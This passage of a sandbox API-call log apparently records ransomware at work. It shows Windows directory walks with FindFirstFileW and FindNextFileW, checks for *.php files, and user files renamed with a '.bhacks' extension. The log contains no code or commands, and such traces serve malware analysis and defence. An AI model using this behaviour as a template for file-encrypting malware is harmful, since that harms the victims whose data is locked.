nFileSizeLow=0x408e, dwReserved0=0x0, dwReserved1=0x0, cFileName="QgQCsu7ShKSSIL.m4a", cAlternateFileName="QGQCSU~1.M4A")) returned 1 [0065.091] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88b6f190, ftCreationTime.dwHighDateTime=0x1d5d631, ftLastAccessTime.dwLowDateTime=0x1cebe780, ftLastAccessTime.dwHighDateTime=0x1d5d024, ftLastWriteTime.dwLowDateTime=0x1cebe780, ftLastWriteTime.dwHighDateTime=0x1d5d024, nFileSizeHigh=0x0, nFileSizeLow=0x7bd2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tab3I0y Y3.avi", cAlternateFileName="TAB3I0~1.AVI")) returned 1 [0065.091] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c10d530, ftCreationTime.dwHighDateTime=0x1d5cb12, ftLastAccessTime.dwLowDateTime=0xe28a1830, ftLastAccessTime.dwHighDateTime=0x1d5d390, ftLastWriteTime.dwLowDateTime=0xe28a1830, ftLastWriteTime.dwHighDateTime=0x1d5d390, nFileSizeHigh=0x0, nFileSizeLow=0x1e8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="TtFu8ac2GuQ.mp3", cAlternateFileName="TTFU8A~1.MP3")) returned 1 [0065.092] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c15f530, ftCreationTime.dwHighDateTime=0x1d5d49d, ftLastAccessTime.dwLowDateTime=0x2fe34c90, ftLastAccessTime.dwHighDateTime=0x1d5d801, ftLastWriteTime.dwLowDateTime=0x2fe34c90, ftLastWriteTime.dwHighDateTime=0x1d5d801, nFileSizeHigh=0x0, nFileSizeLow=0x6236, dwReserved0=0x0, dwReserved1=0x0, cFileName="vY9PyxRY3.odp", cAlternateFileName="VY9PYX~1.ODP")) returned 1 [0065.092] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x241cd0f6, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x241cd0f6, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2421963f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x3450, dwReserved0=0x0, dwReserved1=0x0, cFileName="W3nCKPmZd6_T8yGD3CRn.jpg.bhacks", cAlternateFileName="W3NCKP~1.BHA")) returned 1 [0065.092] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb154e40, ftCreationTime.dwHighDateTime=0x1d5ce80, ftLastAccessTime.dwLowDateTime=0x71f710b0, ftLastAccessTime.dwHighDateTime=0x1d5d263, ftLastWriteTime.dwLowDateTime=0x71f710b0, ftLastWriteTime.dwHighDateTime=0x1d5d263, nFileSizeHigh=0x0, nFileSizeLow=0xa113, dwReserved0=0x0, dwReserved1=0x0, cFileName="WLViPvkU.mp4", cAlternateFileName="")) returned 1 [0065.092] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x2451772f, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yi TyUTEx1dVRHalW", cAlternateFileName="YITYUT~1")) returned 1 [0065.092] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92ca540, ftCreationTime.dwHighDateTime=0x1d5c8c0, ftLastAccessTime.dwLowDateTime=0xc2425e30, ftLastAccessTime.dwHighDateTime=0x1d5c9e9, ftLastWriteTime.dwLowDateTime=0xc2425e30, ftLastWriteTime.dwHighDateTime=0x1d5c9e9, nFileSizeHigh=0x0, nFileSizeLow=0xcf42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZvWDNly8ss.csv", cAlternateFileName="ZVWDNL~1.CSV")) returned 1 [0065.092] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92ca540, ftCreationTime.dwHighDateTime=0x1d5c8c0, ftLastAccessTime.dwLowDateTime=0xc2425e30, ftLastAccessTime.dwHighDateTime=0x1d5c9e9, ftLastWriteTime.dwLowDateTime=0xc2425e30, ftLastWriteTime.dwHighDateTime=0x1d5c9e9, nFileSizeHigh=0x0, nFileSizeLow=0xcf42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZvWDNly8ss.csv", cAlternateFileName="ZVWDNL~1.CSV")) returned 0 [0065.092] FindClose (in: hFindFile=0x9beba0 | out: hFindFile=0x9beba0) returned 1 [0065.093] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.php", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0065.093] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9beba0 [0065.093] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.093] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a026230, ftCreationTime.dwHighDateTime=0x1d5c8dc, ftLastAccessTime.dwLowDateTime=0xce447400, ftLastAccessTime.dwHighDateTime=0x1d5d6f2, ftLastWriteTime.dwLowDateTime=0xce447400, ftLastWriteTime.dwHighDateTime=0x1d5d6f2, nFileSizeHigh=0x0, nFileSizeLow=0x619e, dwReserved0=0x0, dwReserved1=0x0, cFileName="5E4_Kcg6cqpR-gwb.swf", cAlternateFileName="5E4_KC~1.SWF")) returned 1 [0065.093] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccb40900, ftCreationTime.dwHighDateTime=0x1d5d73f, ftLastAccessTime.dwLowDateTime=0xdb0cc290, ftLastAccessTime.dwHighDateTime=0x1d5d0cc, ftLastWriteTime.dwLowDateTime=0xdb0cc290, ftLastWriteTime.dwHighDateTime=0x1d5d0cc, nFileSizeHigh=0x0, nFileSizeLow=0x15772, dwReserved0=0x0, dwReserved1=0x0, cFileName="6xiRzqk0e.mp3", cAlternateFileName="6XIRZQ~1.MP3")) returned 1 [0065.093] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf01d96e0, ftCreationTime.dwHighDateTime=0x1d5d6ea, ftLastAccessTime.dwLowDateTime=0x726bd8e0, ftLastAccessTime.dwHighDateTime=0x1d5c85a, ftLastWriteTime.dwLowDateTime=0x726bd8e0, ftLastWriteTime.dwHighDateTime=0x1d5c85a, nFileSizeHigh=0x0, nFileSizeLow=0xbe65, dwReserved0=0x0, dwReserved1=0x0, cFileName="FisMdRNWBNOEJ4Av.swf", cAlternateFileName="FISMDR~1.SWF")) returned 1 [0065.094] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7febd840, ftCreationTime.dwHighDateTime=0x1d5d678, ftLastAccessTime.dwLowDateTime=0x2be003f0, ftLastAccessTime.dwHighDateTime=0x1d5d729, ftLastWriteTime.dwLowDateTime=0x2be003f0, ftLastWriteTime.dwHighDateTime=0x1d5d729, nFileSizeHigh=0x0, nFileSizeLow=0x7812, dwReserved0=0x0, dwReserved1=0x0, cFileName="JFBPLC7ZEPj.ppt", cAlternateFileName="JFBPLC~1.PPT")) returned 1 [0065.094] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd50430, ftCreationTime.dwHighDateTime=0x1d5d21c, ftLastAccessTime.dwLowDateTime=0xf6f6dab0, ftLastAccessTime.dwHighDateTime=0x1d5ce31, ftLastWriteTime.dwLowDateTime=0xf6f6dab0, ftLastWriteTime.dwHighDateTime=0x1d5ce31, nFileSizeHigh=0x0, nFileSizeLow=0x42b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="RJ4fo8BlUIkNkFgvJDB3.wav", cAlternateFileName="RJ4FO8~1.WAV")) returned 1 [0065.094] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uqU-SQkb", cAlternateFileName="")) returned 1 [0065.094] FindNextFileW (in: hFindFile=0x9beba0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uqU-SQkb", cAlternateFileName="")) returned 0 [0065.094] FindClose (in: hFindFile=0x9beba0 | out: hFindFile=0x9beba0) returned 1 [0065.094] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\*.php", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0065.095] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bed80 [0065.095] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14a3e890, ftCreationTime.dwHighDateTime=0x1d5cc94, ftLastAccessTime.dwLowDateTime=0x99291d00, ftLastAccessTime.dwHighDateTime=0x1d5d758, ftLastWriteTime.dwLowDateTime=0x99291d00, ftLastWriteTime.dwHighDateTime=0x1d5d758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.095] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bda560, ftCreationTime.dwHighDateTime=0x1d5c954, ftLastAccessTime.dwLowDateTime=0xb7ba9f80, ftLastAccessTime.dwHighDateTime=0x1d5cd4b, ftLastWriteTime.dwLowDateTime=0xb7ba9f80, ftLastWriteTime.dwHighDateTime=0x1d5cd4b, nFileSizeHigh=0x0, nFileSizeLow=0x3271, dwReserved0=0x0, dwReserved1=0x0, cFileName="DOdivRJBTXgzUJ.wav", cAlternateFileName="DODIVR~1.WAV")) returned 1 [0065.095] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71fd8190, ftCreationTime.dwHighDateTime=0x1d5d3dd, ftLastAccessTime.dwLowDateTime=0x25c817f0, ftLastAccessTime.dwHighDateTime=0x1d5ce55, ftLastWriteTime.dwLowDateTime=0x25c817f0, ftLastWriteTime.dwHighDateTime=0x1d5ce55, nFileSizeHigh=0x0, nFileSizeLow=0xb4eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="E2jRFWUv.xlsx", cAlternateFileName="E2JRFW~1.XLS")) returned 1 [0065.095] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9298a40, ftCreationTime.dwHighDateTime=0x1d5cdc4, ftLastAccessTime.dwLowDateTime=0xb615c9a0, ftLastAccessTime.dwHighDateTime=0x1d5d360, ftLastWriteTime.dwLowDateTime=0xb615c9a0, ftLastWriteTime.dwHighDateTime=0x1d5d360, nFileSizeHigh=0x0, nFileSizeLow=0x68aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="krWg9z-VUaci.wav", cAlternateFileName="KRWG9Z~1.WAV")) returned 1 [0065.095] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5714a10, ftCreationTime.dwHighDateTime=0x1d5d59b, ftLastAccessTime.dwLowDateTime=0xafa97800, ftLastAccessTime.dwHighDateTime=0x1d5d2cf, ftLastWriteTime.dwLowDateTime=0xafa97800, ftLastWriteTime.dwHighDateTime=0x1d5d2cf, nFileSizeHigh=0x0, nFileSizeLow=0x10b8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="KsPC3.bmp", cAlternateFileName="")) returned 1 [0065.095] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0240, ftCreationTime.dwHighDateTime=0x1d5d7c3, ftLastAccessTime.dwLowDateTime=0x626ed2a0, ftLastAccessTime.dwHighDateTime=0x1d5ccb3, ftLastWriteTime.dwLowDateTime=0x626ed2a0, ftLastWriteTime.dwHighDateTime=0x1d5ccb3, nFileSizeHigh=0x0, nFileSizeLow=0xad34, dwReserved0=0x0, dwReserved1=0x0, cFileName="kZHWiDNy.mp4", cAlternateFileName="")) returned 1 [0065.095] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2d402a0, ftCreationTime.dwHighDateTime=0x1d5d269, ftLastAccessTime.dwLowDateTime=0x6cdeacf0, ftLastAccessTime.dwHighDateTime=0x1d5d1eb, ftLastWriteTime.dwLowDateTime=0x6cdeacf0, ftLastWriteTime.dwHighDateTime=0x1d5d1eb, nFileSizeHigh=0x0, nFileSizeLow=0xad19, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oo6K.m4a", cAlternateFileName="")) returned 1 [0065.095] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbaf9c0, ftCreationTime.dwHighDateTime=0x1d5d70b, ftLastAccessTime.dwLowDateTime=0x47b550f0, ftLastAccessTime.dwHighDateTime=0x1d5c91c, ftLastWriteTime.dwLowDateTime=0x47b550f0, ftLastWriteTime.dwHighDateTime=0x1d5c91c, nFileSizeHigh=0x0, nFileSizeLow=0x168cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="TXjqoZIp1 VeX-aMqDQ6.bmp", cAlternateFileName="TXJQOZ~1.BMP")) returned 1 [0065.095] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbaf9c0, ftCreationTime.dwHighDateTime=0x1d5d70b, ftLastAccessTime.dwLowDateTime=0x47b550f0, ftLastAccessTime.dwHighDateTime=0x1d5c91c, ftLastWriteTime.dwLowDateTime=0x47b550f0, ftLastWriteTime.dwHighDateTime=0x1d5c91c, nFileSizeHigh=0x0, nFileSizeLow=0x168cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="TXjqoZIp1 VeX-aMqDQ6.bmp", cAlternateFileName="TXJQOZ~1.BMP")) returned 0 [0065.095] FindClose (in: hFindFile=0x9bed80 | out: hFindFile=0x9bed80) returned 1 [0065.095] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\*.php", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0065.096] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x2451772f, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9be900 [0065.096] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x2451772f, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.096] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1418d380, ftCreationTime.dwHighDateTime=0x1d5ca0b, ftLastAccessTime.dwLowDateTime=0x9be42560, ftLastAccessTime.dwHighDateTime=0x1d5d165, ftLastWriteTime.dwLowDateTime=0x9be42560, ftLastWriteTime.dwHighDateTime=0x1d5d165, nFileSizeHigh=0x0, nFileSizeLow=0x15674, dwReserved0=0x0, dwReserved1=0x0, cFileName="7HlCuwMi.pptx", cAlternateFileName="7HLCUW~1.PPT")) returned 1 [0065.096] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58416d40, ftCreationTime.dwHighDateTime=0x1d5d368, ftLastAccessTime.dwLowDateTime=0x95e58810, ftLastAccessTime.dwHighDateTime=0x1d5d616, ftLastWriteTime.dwLowDateTime=0x95e58810, ftLastWriteTime.dwHighDateTime=0x1d5d616, nFileSizeHigh=0x0, nFileSizeLow=0x171e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="CZR-hhw59bi.bmp", cAlternateFileName="CZR-HH~1.BMP")) returned 1 [0065.096] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x242b1fc1, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x242b1fc1, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x24370b6b, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x16750, dwReserved0=0x0, dwReserved1=0x0, cFileName="DN0hvZxxCeH-NYAF_H.png.bhacks", cAlternateFileName="DN0HVZ~1.BHA")) returned 1 [0065.096] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2ffd140, ftCreationTime.dwHighDateTime=0x1d5d3a0, ftLastAccessTime.dwLowDateTime=0xa565dfd0, ftLastAccessTime.dwHighDateTime=0x1d5c89f, ftLastWriteTime.dwLowDateTime=0xa565dfd0, ftLastWriteTime.dwHighDateTime=0x1d5c89f, nFileSizeHigh=0x0, nFileSizeLow=0xf21c, dwReserved0=0x0, dwReserved1=0x0, cFileName="dp gvQR2 MYwMzsW1yo.mkv", cAlternateFileName="DPGVQR~1.MKV")) returned 1 [0065.096] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x243e31c1, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x243e31c1, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xa850, dwReserved0=0x0, dwReserved1=0x0, cFileName="iCkvEIW.png.bhacks", cAlternateFileName="ICKVEI~1.BHA")) returned 1 [0065.096] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x434c9c30, ftCreationTime.dwHighDateTime=0x1d5cc28, ftLastAccessTime.dwLowDateTime=0x11453020, ftLastAccessTime.dwHighDateTime=0x1d5cfa8, ftLastWriteTime.dwLowDateTime=0x11453020, ftLastWriteTime.dwHighDateTime=0x1d5cfa8, nFileSizeHigh=0x0, nFileSizeLow=0x4dcd, dwReserved0=0x0, dwReserved1=0x0, cFileName="kFQqlJY89ZuDyS.ppt", cAlternateFileName="KFQQLJ~1.PPT")) returned 1 [0065.096] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5061a0, ftCreationTime.dwHighDateTime=0x1d5cd77, ftLastAccessTime.dwLowDateTime=0xf08f0a70, ftLastAccessTime.dwHighDateTime=0x1d5cd33, ftLastWriteTime.dwLowDateTime=0xf08f0a70, ftLastWriteTime.dwHighDateTime=0x1d5cd33, nFileSizeHigh=0x0, nFileSizeLow=0x2338, dwReserved0=0x0, dwReserved1=0x0, cFileName="luPvkk7BP6.m4a", cAlternateFileName="LUPVKK~1.M4A")) returned 1 [0065.096] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e65510, ftCreationTime.dwHighDateTime=0x1d5d6ee, ftLastAccessTime.dwLowDateTime=0x811c8ad0, ftLastAccessTime.dwHighDateTime=0x1d5cd8a, ftLastWriteTime.dwLowDateTime=0x811c8ad0, ftLastWriteTime.dwHighDateTime=0x1d5cd8a, nFileSizeHigh=0x0, nFileSizeLow=0x17e9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="P-7IEYH2CNc0UByn.m4a", cAlternateFileName="P-7IEY~1.M4A")) returned 1 [0065.096] FindNextFileW (in: hFindFile=0x9be900, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e65510, ftCreationTime.dwHighDateTime=0x1d5d6ee, ftLastAccessTime.dwLowDateTime=0x811c8ad0, ftLastAccessTime.dwHighDateTime=0x1d5cd8a, ftLastWriteTime.dwLowDateTime=0x811c8ad0, ftLastWriteTime.dwHighDateTime=0x1d5cd8a, nFileSizeHigh=0x0, nFileSizeLow=0x17e9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="P-7IEYH2CNc0UByn.m4a", cAlternateFileName="P-7IEY~1.M4A")) returned 0 [0065.096] FindClose (in: hFindFile=0x9be900 | out: hFindFile=0x9be900) returned 1 [0065.096] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\*.php", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0065.097] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feaa0) returned 1 [0065.097] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fea60) returned 1 [0065.097] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0065.097] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0065.097] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2428bb9d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2428bb9d, 